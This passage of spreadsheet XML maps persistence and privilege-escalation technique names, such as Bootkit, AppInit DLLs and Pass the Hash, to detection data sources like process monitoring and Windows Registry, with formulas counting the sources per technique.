        <f t="shared" si="10"/>
        <v>1</v>
      </c>
      <c r="G306" s="53" t="str">
        <f>VLOOKUP(A306,'REF-DataSources'!A:B,2)</f>
        <v>Bootkit</v>
      </c>
    </row>
    <row r="307" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A307" s="53" t="s">
        <v>1901</v>
      </c>
      <c r="B307" s="17" t="str">
        <f>LOOKUP(A307,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Netflow/Enclave netflow,Network protocol analysis,Packet capture</v>
      </c>
      <c r="C307" s="17"/>
      <c r="D307" s="17">
        <f t="shared" si="9"/>
        <v>4</v>
      </c>
      <c r="E307" s="17">
        <f t="shared" si="10"/>
        <v>1</v>
      </c>
      <c r="G307" s="53" t="str">
        <f>VLOOKUP(A307,'REF-DataSources'!A:B,2)</f>
        <v>ROMMONkit</v>
      </c>
    </row>
    <row r="308" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A308" s="53" t="s">
        <v>1906</v>
      </c>
      <c r="B308" s="17" t="str">
        <f>LOOKUP(A308,'REF-DataSources'!A:C)</f>
        <v>Network device run-time memory,Network device command history,Network device configuration,File monitoring,Network device logs</v>
      </c>
      <c r="C308" s="17"/>
      <c r="D308" s="17">
        <f t="shared" si="9"/>
        <v>5</v>
      </c>
      <c r="E308" s="17">
        <f t="shared" si="10"/>
        <v>1</v>
      </c>
      <c r="G308" s="53" t="str">
        <f>VLOOKUP(A308,'REF-DataSources'!A:B,2)</f>
        <v>TFTP Boot</v>
      </c>
    </row>
    <row r="309" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A309" s="53" t="s">
        <v>1911</v>
      </c>
      <c r="B309" s="17" t="str">
        <f>LOOKUP(A309,'REF-DataSources'!A:C)</f>
        <v>Windows event logs,Windows Registry,File monitoring,Process command-line parameters,Process monitoring</v>
      </c>
      <c r="C309" s="17"/>
      <c r="D309" s="17">
        <f t="shared" si="9"/>
        <v>5</v>
      </c>
      <c r="E309" s="17">
        <f t="shared" si="10"/>
        <v>1</v>
      </c>
      <c r="G309" s="53" t="str">
        <f>VLOOKUP(A309,'REF-DataSources'!A:B,2)</f>
        <v>Create or Modify System Process</v>
      </c>
    </row>
    <row r="310" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A310" s="55" t="s">
        <v>1916</v>
      </c>
      <c r="B310" s="17" t="str">
        <f>LOOKUP(A310,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,File monitoring</v>
      </c>
      <c r="C310" s="17" t="s">
        <v>126</v>
      </c>
      <c r="D310" s="17">
        <f t="shared" si="9"/>
        <v>2</v>
      </c>
      <c r="E310" s="17">
        <f t="shared" si="10"/>
        <v>2</v>
      </c>
      <c r="G310" s="53" t="str">
        <f>VLOOKUP(A310,'REF-DataSources'!A:B,2)</f>
        <v>Launch Agent</v>
      </c>
    </row>
    <row r="311" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A311" s="53" t="s">
        <v>1920</v>
      </c>
      <c r="B311" s="17" t="str">
        <f>LOOKUP(A311,'REF-DataSources'!A:C)</f>
        <v>Process command-line parameters,Process monitoring,File monitoring</v>
      </c>
      <c r="C311" s="17"/>
      <c r="D311" s="17">
        <f t="shared" si="9"/>
        <v>3</v>
      </c>
      <c r="E311" s="17">
        <f t="shared" si="10"/>
        <v>1</v>
      </c>
      <c r="G311" s="53" t="str">
        <f>VLOOKUP(A311,'REF-DataSources'!A:B,2)</f>
        <v>Systemd Service</v>
      </c>
    </row>
    <row r="312" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A312" s="53" t="s">
        <v>1924</v>
      </c>
      <c r="B312" s="17" t="str">
        <f>LOOKUP(A312,'REF-DataSources'!A:C)</f>
        <v>API monitoring,Windows event logs,Process command-line parameters,Process monitoring,File monitoring,Windows Registry</v>
      </c>
      <c r="C312" s="17"/>
      <c r="D312" s="17">
        <f t="shared" si="9"/>
        <v>6</v>
      </c>
      <c r="E312" s="17">
        <f t="shared" si="10"/>
        <v>1</v>
      </c>
      <c r="G312" s="53" t="str">
        <f>VLOOKUP(A312,'REF-DataSources'!A:B,2)</f>
        <v>Windows Service</v>
      </c>
    </row>
    <row r="313" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A313" s="55" t="s">
        <v>1929</v>
      </c>
      <c r="B313" s="17" t="str">
        <f>LOOKUP(A313,'REF-DataSources'!A:C)</f>
        <v>File monitoring</v>
      </c>
      <c r="C313" s="17">
        <v>100</v>
      </c>
      <c r="D313" s="17">
        <f t="shared" si="9"/>
        <v>1</v>
      </c>
      <c r="E313" s="17">
        <f t="shared" si="10"/>
        <v>1</v>
      </c>
      <c r="G313" s="53" t="str">
        <f>VLOOKUP(A313,'REF-DataSources'!A:B,2)</f>
        <v>Launch Daemon</v>
      </c>
    </row>
    <row r="314" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A314" s="53" t="s">
        <v>1933</v>
      </c>
      <c r="B314" s="17" t="str">
        <f>LOOKUP(A314,'REF-DataSources'!A:C)</f>
        <v>API monitoring,Windows event logs,System calls,Binary file metadata,Process use of network,WMI Objects,File monitoring,Process command-line parameters,Process monitoring,Loaded DLLs,DLL monitoring,Windows Registry</v>
      </c>
      <c r="C314" s="17"/>
      <c r="D314" s="17">
        <f t="shared" si="9"/>
        <v>12</v>
      </c>
      <c r="E314" s="17">
        <f t="shared" si="10"/>
        <v>1</v>
      </c>
      <c r="G314" s="53" t="str">
        <f>VLOOKUP(A314,'REF-DataSources'!A:B,2)</f>
        <v>Event Triggered Execution</v>
      </c>
    </row>
    <row r="315" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A315" s="53" t="s">
        <v>1939</v>
      </c>
      <c r="B315" s="17" t="str">
        <f>LOOKUP(A315,'REF-DataSources'!A:C)</f>
        <v>Process command-line parameters,Process monitoring,Windows Registry</v>
      </c>
      <c r="C315" s="17"/>
      <c r="D315" s="17">
        <f t="shared" si="9"/>
        <v>3</v>
      </c>
      <c r="E315" s="17">
        <f t="shared" si="10"/>
        <v>1</v>
      </c>
      <c r="G315" s="53" t="str">
        <f>VLOOKUP(A315,'REF-DataSources'!A:B,2)</f>
        <v>Change Default File Association</v>
      </c>
    </row>
    <row r="316" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A316" s="53" t="s">
        <v>1944</v>
      </c>
      <c r="B316" s="17" t="str">
        <f>LOOKUP(A316,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Windows Registry,Process command-line parameters,Process monitoring</v>
      </c>
      <c r="C316" s="17"/>
      <c r="D316" s="17">
        <f t="shared" si="9"/>
        <v>4</v>
      </c>
      <c r="E316" s="17">
        <f t="shared" si="10"/>
        <v>1</v>
      </c>
      <c r="G316" s="53" t="str">
        <f>VLOOKUP(A316,'REF-DataSources'!A:B,2)</f>
        <v>Screensaver</v>
      </c>
    </row>
    <row r="317" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A317" s="53" t="s">
        <v>1949</v>
      </c>
      <c r="B317" s="17" t="str">
        <f>LOOKUP(A317,'REF-DataSources'!A:C)</f>
        <v>Process command-line parameters,Process monitoring,WMI Objects</v>
      </c>
      <c r="C317" s="17"/>
      <c r="D317" s="17">
        <f t="shared" si="9"/>
        <v>3</v>
      </c>
      <c r="E317" s="17">
        <f t="shared" si="10"/>
        <v>1</v>
      </c>
      <c r="G317" s="53" t="str">
        <f>VLOOKUP(A317,'REF-DataSources'!A:B,2)</f>
        <v>Windows Management Instrumentation Event Subscription</v>
      </c>
    </row>
    <row r="318" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A318" s="53" t="s">
        <v>1954</v>
      </c>
      <c r="B318" s="17" t="str">
        <f>LOOKUP(A318,'REF-DataSources'!A:C)</f>
        <v>Process use of network,Process command-line parameters,Process monitoring,File monitoring</v>
      </c>
      <c r="C318" s="17"/>
      <c r="D318" s="17">
        <f t="shared" si="9"/>
        <v>4</v>
      </c>
      <c r="E318" s="17">
        <f t="shared" si="10"/>
        <v>1</v>
      </c>
      <c r="G318" s="53" t="str">
        <f>VLOOKUP(A318,'REF-DataSources'!A:B,2)</f>
        <v>.bash_profile and .bashrc</v>
      </c>
    </row>
    <row r="319" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A319" s="53" t="s">
        <v>1958</v>
      </c>
      <c r="B319" s="17" t="str">
        <f>LOOKUP(A319,'REF-DataSources'!A:C)</f>
        <v>Process command-line parameters,Process monitoring,File monitoring</v>
      </c>
      <c r="C319" s="17"/>
      <c r="D319" s="17">
        <f t="shared" si="9"/>
        <v>3</v>
      </c>
      <c r="E319" s="17">
        <f t="shared" si="10"/>
        <v>1</v>
      </c>
      <c r="G319" s="53" t="str">
        <f>VLOOKUP(A319,'REF-DataSources'!A:B,2)</f>
        <v>Trap</v>
      </c>
    </row>
    <row r="320" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A320" s="53" t="s">
        <v>1962</v>
      </c>
      <c r="B320" s="17" t="str">
        <f>LOOKUP(A320,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process command-line parameters,Process monitoring,Binary file metadata</v>
      </c>
      <c r="C320" s="17"/>
      <c r="D320" s="17">
        <f t="shared" si="9"/>
        <v>4</v>
      </c>
      <c r="E320" s="17">
        <f t="shared" si="10"/>
        <v>1</v>
      </c>
      <c r="G320" s="53" t="str">
        <f>VLOOKUP(A320,'REF-DataSources'!A:B,2)</f>
        <v>LC_LOAD_DYLIB Addition</v>
      </c>
    </row>
    <row r="321" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A321" s="53" t="s">
        <v>1967</v>
      </c>
      <c r="B321" s="17" t="str">
        <f>LOOKUP(A321,'REF-DataSources'!A:C)</f>
        <v>Process command-line parameters,Process monitoring,Windows Registry,DLL monitoring</v>
      </c>
      <c r="C321" s="17"/>
      <c r="D321" s="17">
        <f t="shared" si="9"/>
        <v>4</v>
      </c>
      <c r="E321" s="17">
        <f t="shared" si="10"/>
        <v>1</v>
      </c>
      <c r="G321" s="53" t="str">
        <f>VLOOKUP(A321,'REF-DataSources'!A:B,2)</f>
        <v>Netsh Helper DLL</v>
      </c>
    </row>
    <row r="322" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A322" s="53" t="s">
        <v>1972</v>
      </c>
      <c r="B322" s="17" t="str">
        <f>LOOKUP(A322,'REF-DataSources'!A:C)</f>
        <v>Process command-line parameters,Process monitoring,File monitoring,Windows Registry</v>
      </c>
      <c r="C322" s="17"/>
      <c r="D322" s="17">
        <f t="shared" si="9"/>
        <v>4</v>
      </c>
      <c r="E322" s="17">
        <f t="shared" si="10"/>
        <v>1</v>
      </c>
      <c r="G322" s="53" t="str">
        <f>VLOOKUP(A322,'REF-DataSources'!A:B,2)</f>
        <v>Accessibility Features</v>
      </c>
    </row>
    <row r="323" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A323" s="53" t="s">
        <v>1977</v>
      </c>
      <c r="B323" s="17" t="str">
        <f>LOOKUP(A323,'REF-DataSources'!A:C)</f>
        <v>Windows Registry,Process command-line parameters,Process monitoring,Loaded DLLs</v>
      </c>
      <c r="C323" s="17"/>
      <c r="D323" s="17">
        <f t="shared" ref="D323:D386" si="11">LEN(TRIM(B323))-LEN(SUBSTITUTE(TRIM(B323),",",""))+1</f>
        <v>4</v>
      </c>
      <c r="E323" s="17">
        <f t="shared" si="10"/>
        <v>1</v>
      </c>
      <c r="G323" s="53" t="str">
        <f>VLOOKUP(A323,'REF-DataSources'!A:B,2)</f>
        <v>AppCert DLLs</v>
      </c>
    </row>
    <row r="324" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A324" s="53" t="s">
        <v>1981</v>
      </c>
      <c r="B324" s="17" t="str">
        <f>LOOKUP(A324,'REF-DataSources'!A:C)</f>
        <v>Windows Registry,Process command-line parameters,Process monitoring,Loaded DLLs</v>
      </c>
      <c r="C324" s="17"/>
      <c r="D324" s="17">
        <f t="shared" si="11"/>
        <v>4</v>
      </c>
      <c r="E324" s="17">
        <f t="shared" si="10"/>
        <v>1</v>
      </c>
      <c r="G324" s="53" t="str">
        <f>VLOOKUP(A324,'REF-DataSources'!A:B,2)</f>
        <v>AppInit DLLs</v>
      </c>
    </row>
    <row r="325" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A325" s="53" t="s">
        <v>1985</v>
      </c>
      <c r="B325" s="17" t="str">
        <f>LOOKUP(A325,'REF-DataSources'!A:C)</f>
        <v>Process command-line parameters,Process monitoring,Windows Registry</v>
      </c>
      <c r="C325" s="17"/>
      <c r="D325" s="17">
        <f t="shared" si="11"/>
        <v>3</v>
      </c>
      <c r="E325" s="17">
        <f t="shared" si="10"/>
        <v>1</v>
      </c>
      <c r="G325" s="53" t="str">
        <f>VLOOKUP(A325,'REF-DataSources'!A:B,2)</f>
        <v>Application Shimming</v>
      </c>
    </row>
    <row r="326" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A326" s="53" t="s">
        <v>1989</v>
      </c>
      <c r="B326" s="17" t="str">
        <f>LOOKUP(A326,'REF-DataSources'!A:C)</f>
        <v>API monitoring,Windows event logs,Windows Registry,Process command-line parameters,Process monitoring</v>
      </c>
      <c r="C326" s="17"/>
      <c r="D326" s="17">
        <f t="shared" si="11"/>
        <v>5</v>
      </c>
      <c r="E326" s="17">
        <f t="shared" si="10"/>
        <v>1</v>
      </c>
      <c r="G326" s="53" t="str">
        <f>VLOOKUP(A326,'REF-DataSources'!A:B,2)</f>
        <v>Image File Execution Options Injection</v>
      </c>
    </row>
    <row r="327" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A327" s="53" t="s">
        <v>1994</v>
      </c>
      <c r="B327" s="17" t="str">
        <f>LOOKUP(A327,'REF-DataSources'!A:C)</f>
        <v>PowerShell logs,File monitoring,Process command-line parameters,Process monitoring</v>
      </c>
      <c r="C327" s="17"/>
      <c r="D327" s="17">
        <f t="shared" si="11"/>
        <v>4</v>
      </c>
      <c r="E327" s="17">
        <f t="shared" si="10"/>
        <v>1</v>
      </c>
      <c r="G327" s="53" t="str">
        <f>VLOOKUP(A327,'REF-DataSources'!A:B,2)</f>
        <v>PowerShell Profile</v>
      </c>
    </row>
    <row r="328" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A328" s="55" t="s">
        <v>1999</v>
      </c>
      <c r="B328" s="17" t="str">
        <f>LOOKUP(A328,'REF-DataSources'!A:C)</f>
        <v>File monitoring</v>
      </c>
      <c r="C328" s="17">
        <v>100</v>
      </c>
      <c r="D328" s="17">
        <f t="shared" si="11"/>
        <v>1</v>
      </c>
      <c r="E328" s="17">
        <f t="shared" si="10"/>
        <v>1</v>
      </c>
      <c r="G328" s="53" t="str">
        <f>VLOOKUP(A328,'REF-DataSources'!A:B,2)</f>
        <v>Emond</v>
      </c>
    </row>
    <row r="329" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A329" s="53" t="s">
        <v>2003</v>
      </c>
      <c r="B329" s="17" t="str">
        <f>LOOKUP(A329,'REF-DataSources'!A:C)</f>
        <v>Process command-line parameters,Process monitoring,Loaded DLLs,DLL monitoring,Windows Registry</v>
      </c>
      <c r="C329" s="17"/>
      <c r="D329" s="17">
        <f t="shared" si="11"/>
        <v>5</v>
      </c>
      <c r="E329" s="17">
        <f t="shared" si="10"/>
        <v>1</v>
      </c>
      <c r="G329" s="53" t="str">
        <f>VLOOKUP(A329,'REF-DataSources'!A:B,2)</f>
        <v>Component Object Model Hijacking</v>
      </c>
    </row>
    <row r="330" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A330" s="55" t="s">
        <v>2008</v>
      </c>
      <c r="B330" s="17" t="str">
        <f>LOOKUP(A330,'REF-DataSources'!A:C)</f>
        <v/>
      </c>
      <c r="C330" s="17">
        <v>0</v>
      </c>
      <c r="D330" s="17">
        <f t="shared" si="11"/>
        <v>1</v>
      </c>
      <c r="E330" s="17">
        <f t="shared" ref="E330:E393" si="12">LEN(TRIM(C330))-LEN(SUBSTITUTE(TRIM(C330),";",""))+1</f>
        <v>1</v>
      </c>
      <c r="G330" s="53" t="str">
        <f>VLOOKUP(A330,'REF-DataSources'!A:B,2)</f>
        <v>Boot or Logon Autostart Execution</v>
      </c>
    </row>
    <row r="331" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A331" s="53" t="s">
        <v>2012</v>
      </c>
      <c r="B331" s="17" t="str">
        <f>LOOKUP(A331,'REF-DataSources'!A:C)</f>
        <v>Windows Registry,File monitoring</v>
      </c>
      <c r="C331" s="17"/>
      <c r="D331" s="17">
        <f t="shared" si="11"/>
        <v>2</v>
      </c>
      <c r="E331" s="17">
        <f t="shared" si="12"/>
        <v>1</v>
      </c>
      <c r="G331" s="53" t="str">
        <f>VLOOKUP(A331,'REF-DataSources'!A:B,2)</f>
        <v>Registry Run Keys / Startup Folder</v>
      </c>
    </row>
    <row r="332" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A332" s="53" t="s">
        <v>2017</v>
      </c>
      <c r="B332" s="17" t="str">
        <f>LOOKUP(A332,'REF-DataSources'!A:C)</f>
        <v>DLL monitoring,Windows Registry,Loaded DLLs</v>
      </c>
      <c r="C332" s="17"/>
      <c r="D332" s="17">
        <f t="shared" si="11"/>
        <v>3</v>
      </c>
      <c r="E332" s="17">
        <f t="shared" si="12"/>
        <v>1</v>
      </c>
      <c r="G332" s="53" t="str">
        <f>VLOOKUP(A332,'REF-DataSources'!A:B,2)</f>
        <v>Authentication Package</v>
      </c>
    </row>
    <row r="333" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A333" s="53" t="s">
        <v>2022</v>
      </c>
      <c r="B333" s="17" t="str">
        <f>LOOKUP(A333,'REF-DataSources'!A:C)</f>
        <v>API monitoring,Binary file metadata,DLL monitoring,File monitoring,Loaded DLLs,Process monitoring</v>
      </c>
      <c r="C333" s="17"/>
      <c r="D333" s="17">
        <f t="shared" si="11"/>
        <v>6</v>
      </c>
      <c r="E333" s="17">
        <f t="shared" si="12"/>
        <v>1</v>
      </c>
      <c r="G333" s="53" t="str">
        <f>VLOOKUP(A333,'REF-DataSources'!A:B,2)</f>
        <v>Time Providers</v>
      </c>
    </row>
    <row r="334" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A334" s="53" t="s">
        <v>2027</v>
      </c>
      <c r="B334" s="17" t="str">
        <f>LOOKUP(A334,'REF-DataSources'!A:C)</f>
        <v>Windows Registry,File monitoring,Process monitoring</v>
      </c>
      <c r="C334" s="17"/>
      <c r="D334" s="17">
        <f t="shared" si="11"/>
        <v>3</v>
      </c>
      <c r="E334" s="17">
        <f t="shared" si="12"/>
        <v>1</v>
      </c>
      <c r="G334" s="53" t="str">
        <f>VLOOKUP(A334,'REF-DataSources'!A:B,2)</f>
        <v>Winlogon Helper DLL</v>
      </c>
    </row>
    <row r="335" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A335" s="53" t="s">
        <v>2032</v>
      </c>
      <c r="B335" s="17" t="str">
        <f>LOOKUP(A335,'REF-DataSources'!A:C)</f>
        <v>DLL monitoring,Windows Registry,Loaded DLLs</v>
      </c>
      <c r="C335" s="17"/>
      <c r="D335" s="17">
        <f t="shared" si="11"/>
        <v>3</v>
      </c>
      <c r="E335" s="17">
        <f t="shared" si="12"/>
        <v>1</v>
      </c>
      <c r="G335" s="53" t="str">
        <f>VLOOKUP(A335,'REF-DataSources'!A:B,2)</f>
        <v>Security Support Provider</v>
      </c>
    </row>
    <row r="336" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A336" s="53" t="s">
        <v>2036</v>
      </c>
      <c r="B336" s="17" t="str">
        <f>LOOKUP(A336,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C336" s="17"/>
      <c r="D336" s="17">
        <f t="shared" si="11"/>
        <v>2</v>
      </c>
      <c r="E336" s="17">
        <f t="shared" si="12"/>
        <v>1</v>
      </c>
      <c r="G336" s="53" t="str">
        <f>VLOOKUP(A336,'REF-DataSources'!A:B,2)</f>
        <v>Kernel Modules and Extensions</v>
      </c>
    </row>
    <row r="337" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A337" s="55" t="s">
        <v>2040</v>
      </c>
      <c r="B337" s="17" t="str">
        <f>LOOKUP(A337,'REF-DataSources'!A:C)</f>
        <v>File monitoring</v>
      </c>
      <c r="C337" s="17">
        <v>100</v>
      </c>
      <c r="D337" s="17">
        <f t="shared" si="11"/>
        <v>1</v>
      </c>
      <c r="E337" s="17">
        <f t="shared" si="12"/>
        <v>1</v>
      </c>
      <c r="G337" s="53" t="str">
        <f>VLOOKUP(A337,'REF-DataSources'!A:B,2)</f>
        <v>Re-opened Applications</v>
      </c>
    </row>
    <row r="338" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A338" s="53" t="s">
        <v>2044</v>
      </c>
      <c r="B338" s="17" t="str">
        <f>LOOKUP(A338,'REF-DataSources'!A:C)</f>
        <v>DLL monitoring,File monitoring,Loaded DLLs,Process monitoring</v>
      </c>
      <c r="C338" s="17"/>
      <c r="D338" s="17">
        <f t="shared" si="11"/>
        <v>4</v>
      </c>
      <c r="E338" s="17">
        <f t="shared" si="12"/>
        <v>1</v>
      </c>
      <c r="G338" s="53" t="str">
        <f>VLOOKUP(A338,'REF-DataSources'!A:B,2)</f>
        <v>LSASS Driver</v>
      </c>
    </row>
    <row r="339" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A339" s="53" t="s">
        <v>2049</v>
      </c>
      <c r="B339" s="17" t="str">
        <f>LOOKUP(A339,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C339" s="17"/>
      <c r="D339" s="17">
        <f t="shared" si="11"/>
        <v>3</v>
      </c>
      <c r="E339" s="17">
        <f t="shared" si="12"/>
        <v>1</v>
      </c>
      <c r="G339" s="53" t="str">
        <f>VLOOKUP(A339,'REF-DataSources'!A:B,2)</f>
        <v>Shortcut Modification</v>
      </c>
    </row>
    <row r="340" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A340" s="53" t="s">
        <v>2053</v>
      </c>
      <c r="B340" s="17" t="str">
        <f>LOOKUP(A340,'REF-DataSources'!A:C)</f>
        <v>File monitoring,API monitoring,DLL monitoring,Windows Registry,Process monitoring</v>
      </c>
      <c r="C340" s="53"/>
      <c r="D340" s="17">
        <f t="shared" si="11"/>
        <v>5</v>
      </c>
      <c r="E340" s="17">
        <f t="shared" si="12"/>
        <v>1</v>
      </c>
      <c r="G340" s="53" t="str">
        <f>VLOOKUP(A340,'REF-DataSources'!A:B,2)</f>
        <v>Port Monitors</v>
      </c>
    </row>
    <row r="341" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A341" s="53" t="s">
        <v>2058</v>
      </c>
      <c r="B341" s="17" t="str">
        <f>LOOKUP(A341,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C341" s="53"/>
      <c r="D341" s="17">
        <f t="shared" si="11"/>
        <v>3</v>
      </c>
      <c r="E341" s="17">
        <f t="shared" si="12"/>
        <v>1</v>
      </c>
      <c r="G341" s="53" t="str">
        <f>VLOOKUP(A341,'REF-DataSources'!A:B,2)</f>
        <v>Plist Modification</v>
      </c>
    </row>
    <row r="342" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A342" s="53" t="s">
        <v>2062</v>
      </c>
      <c r="B342" s="17" t="str">
        <f>LOOKUP(A342,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,Windows Registry,File monitoring,DLL monitoring,API monitoring</v>
      </c>
      <c r="C342" s="53"/>
      <c r="D342" s="17">
        <f t="shared" si="11"/>
        <v>5</v>
      </c>
      <c r="E342" s="17">
        <f t="shared" si="12"/>
        <v>1</v>
      </c>
      <c r="G342" s="53" t="str">
        <f>VLOOKUP(A342,'REF-DataSources'!A:B,2)</f>
        <v>Print Processors</v>
      </c>
    </row>
    <row r="343" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A343" s="53" t="s">
        <v>2067</v>
      </c>
      <c r="B343" s="17" t="str">
        <f>LOOKUP(A343,'REF-DataSources'!A:C)</f>
        <v>Windows Registry,File monitoring,Process command-line parameters,API monitoring,Process monitoring</v>
      </c>
      <c r="C343" s="53"/>
      <c r="D343" s="17">
        <f t="shared" si="11"/>
        <v>5</v>
      </c>
      <c r="E343" s="17">
        <f t="shared" si="12"/>
        <v>1</v>
      </c>
      <c r="G343" s="53" t="str">
        <f>VLOOKUP(A343,'REF-DataSources'!A:B,2)</f>
        <v>Abuse Elevation Control Mechanism</v>
      </c>
    </row>
    <row r="344" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A344" s="53" t="s">
        <v>2073</v>
      </c>
      <c r="B344" s="17" t="str">
        <f>LOOKUP(A344,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C344" s="53"/>
      <c r="D344" s="17">
        <f t="shared" si="11"/>
        <v>3</v>
      </c>
      <c r="E344" s="17">
        <f t="shared" si="12"/>
        <v>1</v>
      </c>
      <c r="G344" s="53" t="str">
        <f>VLOOKUP(A344,'REF-DataSources'!A:B,2)</f>
        <v>Setuid and Setgid</v>
      </c>
    </row>
    <row r="345" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A345" s="53" t="s">
        <v>2077</v>
      </c>
      <c r="B345" s="17" t="str">
        <f>LOOKUP(A345,'REF-DataSources'!A:C)</f>
        <v>Windows Registry,Process command-line parameters,Process monitoring</v>
      </c>
      <c r="C345" s="53"/>
      <c r="D345" s="17">
        <f t="shared" si="11"/>
        <v>3</v>
      </c>
      <c r="E345" s="17">
        <f t="shared" si="12"/>
        <v>1</v>
      </c>
      <c r="G345" s="53" t="str">
        <f>VLOOKUP(A345,'REF-DataSources'!A:B,2)</f>
        <v>Bypass User Account Control</v>
      </c>
    </row>
    <row r="346" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A346" s="53" t="s">
        <v>2083</v>
      </c>
      <c r="B346" s="17" t="str">
        <f>LOOKUP(A346,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process command-line parameters</v>
      </c>
      <c r="C346" s="53"/>
      <c r="D346" s="17">
        <f t="shared" si="11"/>
        <v>2</v>
      </c>
      <c r="E346" s="17">
        <f t="shared" si="12"/>
        <v>1</v>
      </c>
      <c r="G346" s="53" t="str">
        <f>VLOOKUP(A346,'REF-DataSources'!A:B,2)</f>
        <v>Sudo and Sudo Caching</v>
      </c>
    </row>
    <row r="347" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A347" s="55" t="s">
        <v>2088</v>
      </c>
      <c r="B347" s="17" t="str">
        <f>LOOKUP(A347,'REF-DataSources'!A:C)</f>
        <v>API monitoring,Process monitoring,File monitoring</v>
      </c>
      <c r="C347" s="53" t="s">
        <v>3110</v>
      </c>
      <c r="D347" s="17">
        <f t="shared" si="11"/>
        <v>3</v>
      </c>
      <c r="E347" s="17">
        <f t="shared" si="12"/>
        <v>3</v>
      </c>
      <c r="G347" s="53" t="str">
        <f>VLOOKUP(A347,'REF-DataSources'!A:B,2)</f>
        <v>Elevated Execution with Prompt</v>
      </c>
    </row>
    <row r="348" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A348" s="55" t="s">
        <v>2092</v>
      </c>
      <c r="B348" s="17" t="str">
        <f>LOOKUP(A348,'REF-DataSources'!A:C)</f>
        <v>Office 365 audit logs,OAuth audit logs,Authentication logs</v>
      </c>
      <c r="C348" s="53" t="s">
        <v>3110</v>
      </c>
      <c r="D348" s="17">
        <f t="shared" si="11"/>
        <v>3</v>
      </c>
      <c r="E348" s="17">
        <f t="shared" si="12"/>
        <v>3</v>
      </c>
      <c r="G348" s="53" t="str">
        <f>VLOOKUP(A348,'REF-DataSources'!A:B,2)</f>
        <v>Use Alternate Authentication Material</v>
      </c>
    </row>
    <row r="349" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A349" s="55" t="s">
        <v>2100</v>
      </c>
      <c r="B349" s="17" t="str">
        <f>LOOKUP(A349,'REF-DataSources'!A:C)</f>
        <v>Office 365 audit logs,OAuth audit logs</v>
      </c>
      <c r="C349" s="53" t="s">
        <v>259</v>
      </c>
      <c r="D349" s="17">
        <f t="shared" si="11"/>
        <v>2</v>
      </c>
      <c r="E349" s="17">
        <f t="shared" si="12"/>
        <v>2</v>
      </c>
      <c r="G349" s="53" t="str">
        <f>VLOOKUP(A349,'REF-DataSources'!A:B,2)</f>
        <v>Application Access Token</v>
      </c>
    </row>
    <row r="350" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A350" s="55" t="s">
        <v>2106</v>
      </c>
      <c r="B350" s="17" t="str">
        <f>LOOKUP(A350,'REF-DataSources'!A:C)</f>
        <v>Authentication logs</v>
      </c>
      <c r="C350" s="53">
        <v>100</v>
      </c>
      <c r="D350" s="17">
        <f t="shared" si="11"/>
        <v>1</v>
      </c>
      <c r="E350" s="17">
        <f t="shared" si="12"/>
        <v>1</v>
      </c>
      <c r="G350" s="53" t="str">
        <f>VLOOKUP(A350,'REF-DataSources'!A:B,2)</f>
        <v>Pass the Hash</v>
      </c>
    </row>
    <row r="351" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A351" s="55" t="s">
        <v>2110</v>
      </c>
      <c r="B351" s="17" t="str">
        <f>LOOKUP(A351,'REF-DataSources'!A:C)</f>
        <v>Authentication logs</v>
      </c>
      <c r="C351" s="53">
        <v>100</v>
      </c>
      <c r="D351" s="17">
        <f t="shared" si="11"/>
        <v>1</v>
      </c>
      <c r="E351" s="17">
        <f t="shared" si="12"/>
        <v>1</v>
      </c>
